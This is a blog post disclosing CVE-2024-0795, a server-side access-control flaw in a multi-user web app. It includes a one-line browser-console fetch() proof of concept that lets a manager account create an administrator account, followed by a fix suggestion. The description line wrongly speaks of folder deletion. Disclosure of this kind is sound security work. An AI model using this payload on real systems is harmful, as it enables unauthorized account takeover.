Featured image of post CVE-2024-0795 - Improper acces control / admin account takeover
cve web server bounty

CVE-2024-0795 - Improper acces control / admin account takeover

Description of the CVE-2024-0795

Improper input validation leads to arbitrary folder deletion (recursively)

🔒️ Requirements

  • Multi-user mode activated
  • Be manager

👀 Observation

We can see in the ui the manager account cannot create / add / modify admin account however the protection is not present in the server.

💥 Proof of Concept

Here is the actual users :
image

I will use raltheo2 account.

  1. I open chrome dev tools
  2. Inside the console I put :
1

fetch('/api/admin/users/new', {method: 'POST',headers: {'Authorization': `Bearer ${localStorage.getItem('anythingllm_authToken')}`,'Content-Type':'application/json'}, body: JSON.stringify({username: 'supadmin9', password: 'password', role: 'admin'})})

image

This will create an administrator account named supadmin9 with password password

image

Now login into your new admin account :)

🛠️ Fix suggestion

Separation should be made between admin and manager in server side as in the frontend.

🖊️ références

You can find the report here and the CVE details here.

© 2020 - 2026 Raltheo
Built with Hugo
Theme Stack designed by Jimmy